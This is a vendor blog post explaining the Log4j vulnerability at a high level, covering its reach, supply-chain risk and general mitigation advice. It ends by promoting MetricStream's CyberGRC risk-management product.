The Ripple of Effects of Log4J: How You Can Stay Prepared and Resilient
- IT Risk & Cyber Risk
- 08 February 22
Introduction
Since the Log4j cyber vulnerability became public in early December 2021, there have been more than 100 new hacking attempts every minute.
- Hackers were able to take over a world-building game’s server before the patch was released.
- A government defense ministry was forced to shut down parts of its computer network.
- The U.S. Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) released mitigation guidelines for organizations, with its Director, Jen Easterly, calling the Log4j software vulnerability the most serious vulnerability she’s seen in her career.
So, what is Log4j and why is it being called one of the ‘worst attacks in history?’
How can it affect your organization, your cyber risk exposure, and how you assess your third parties and vendors?
What are the steps you can take to mitigate this urgent cybersecurity risk?
We bring you the answers to these critical questions.
A Vulnerability in a Widely Used Bit of Software
Log4j is an open-source software from the all-volunteer Apache Software Foundation. Freely available open-source software, like Log4j, is used by programmers as building blocks to do common tasks. Java programmers use Log4j to create a log of all activity on a device as the programs run. It is an extremely useful tool for programmers as it takes a string of code, copies it, in addition to examining the string and interpreting it.
However, as now exposed, Log4j has a vulnerability that allows the abuse of a feature —one that allows users to specify custom code for formatting a log message.
The consequence: third-party servers can submit software code that can perform a wide range of actions on the targeted computer, including stealing data, taking control of the system, and attacking with malware. This allows hackers to take control of web servers and launch remote attacks, giving them control of the computer services.
Widespread Impact Due to its Simplicity to Exploit
The fact that Log4j is a common piece of software appearing in millions of devices, combined with the simplicity to exploit, makes it a grave matter of concern. Log4j is widespread in cloud services, video games, industrial and hospital equipment, as well as software and security tools.
This makes potentially every device vulnerable to hacks, putting almost everyone at risk including governments, corporate systems, and individuals.
For enterprises, risk exposure to the Log4j vulnerability is even greater.
With the global increase of employees working from home due to the ongoing pandemic the risk of company data on personal devices being compromised unknowingly becomes greater. There is a very real risk of hackers exploiting the vulnerability to hack “shadow IT” appliances, those not centrally managed.
Key suppliers, vendors, third-party providers, and even fourth-party providers of enterprises who are part of the supply chain and provide critical support could also serve as a source for Log4j vulnerability exploitation.
Since Log4j is currently being used in many critical support infrastructures such as cloud platforms, web applications, and email services, a wide range of systems could be at risk from Log4j vulnerability. A provider of Internet hosting for software development and version control using Git has published a list of vulnerable applications and systems.
Moreover, most large organizations will also need to be aware of the risk from any of their own products that may have been built with enterprise Java software that legitimately used Log4j.
Next Steps: Addressing the Log4j Vulnerability
State-sponsored and cyber-criminal attackers have been exploiting the Log4j flaw throughout the month of December 2021 and continue to do so.
It is important to be aware that it is difficult to find Log4j within your organization’s software system because this open-source component is often “bundled” in the software. Companies may not even realize they are compromised.
Beyond implementing measures to stop any immediate risks, the long-term solution will always be to use scanning tools to assess your company’s risk and impact. Furthermore, an additional review of devices where there might be vulnerable installations will be needed.
How Can MetricStream Help?
MetricStream’s CyberGRC product can help you by:
- Providing a centralized repository for all your threats and vulnerabilities and streamline management on these issues by bridging silos within your company
- Assessing and managing your IT risks including impact assessment of IT vendor risk exposure
- Quantifying your cyber risk, especially when you locate the risk and even create various simulations to get a more accurate value of your risks
MetricStream’s ConnectedGRC provides a proactive approach to compliance and risk management giving you the power to rapidly scale and adapt your programs to emerging and evolving risks. Built as an interconnected, intuitive, and intelligent GRC program, our CyberGRC product line enables your organization to collate data from across the enterprise, including third and fourth-party vendors, which can then be transformed into actionable business intelligence to support data-driven decision-making.
This will help your organization gain:
- Real-time visibility in overall company risks and vulnerabilities with a 360-degree view of overall reporting and dashboards
- Improved efficiency by correlating vulnerabilities with IT assets, and prioritizing remediation efforts based on the highest levels of threats
- Increased assurance especially from your tech partners
Want to learn more? Write to me at jbhowmick@metricstream.com to discuss how to mitigate your risk from the Log4j vulnerability.
Check out more resources related to cybersecurity:
The Ultimate Guide to Cyber Security and IT & Cyber Risk
